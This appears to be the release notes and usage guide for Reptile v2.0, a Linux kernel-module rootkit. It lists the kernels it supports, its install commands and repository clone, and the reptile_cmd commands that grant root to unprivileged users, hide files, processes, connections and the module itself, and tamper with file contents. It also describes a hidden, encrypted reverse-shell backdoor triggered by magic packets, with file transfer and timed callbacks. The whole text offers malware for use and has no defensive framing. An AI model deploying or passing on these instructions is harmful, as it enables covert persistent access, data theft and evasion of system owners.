Reptile v2.0 releases: LKM Linux rootkit
Debian 9: 4.9.0-8-amd64
Debian 10: 4.19.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 8: 4.18.0-147.5.1.el8_1.x86_64
- Give root to unprivileged users
- Hide files and directories
- Hide processes
- Hide himself
- Hide TCP/IP connections
- Hidden boot persistence
- File content tampering
- Some obfuscation techniques
- ICMP/UDP/TCP port-knocking backdoor
- Full TTY/PTY shell with file transfer
- Client to handle Reptile Shell
- Shell connect back each X times (not default)
- configuring start script and fixing
- Fixing packet sender encryption
- uncommenting lines with persistence
- Defining PWD
apt-get install linux-headers-$(uname -r)
perl -MCPAN -e “install String::Unescape”
git clone https://github.com/f0rb1dd3n/Reptile.git
Give root to unprivileged users
To get root privileges just type: /reptile/reptile_cmd root
Hide files, directories and kernel module
All files and folders that has reptile in the name will be hidden. You can configure this in the installation script. The following commands hide/unhide files, folders, processes and kernel module.
To hide: /reptile/reptile_cmd hide
To unhide: /reptile/reptile_cmd show
To hide processes: /reptile/reptile_cmd hide <pid>
To unhide processes: /reptile/reptile_cmd show <pid>
Hide TCP/IP connections
Hide: /reptile/reptile_cmd conn <IP> <port> hide
Unhide: /reptile/reptile_cmd conn <IP> <port> show
File content tampering
All content between tags will be hidden:
#<reptile> content to hide #</reptile>
You can configure these tags in the installation script.
The backdoor is a reverse shell triggered by a magic packet sent via TCP, UDP or ICMP protocol.
The client is MSF-like and its usage is very easy. Run ./client and just type help to see the commands.
There are another two binaries: listener and packet. The client binary will handle listener and packet but you can use them separately if you want:
The shell easy to use, just type help to see the commands.
- It already hide its process and connection.
- Its connection is encrypted
- There is a file uploader and file downloader inside.
- You can set a delay to receive a reverse connection every time you want.
- If you run shell you will get a full TTY/PTY shell like ssh.
You can compile this shell in a standalone version to use without the Kernel Module:
You will need to use listener to connect with the standalone reverse shell because you won’t send magic packets. Just compile with ./setup client and use listener binary!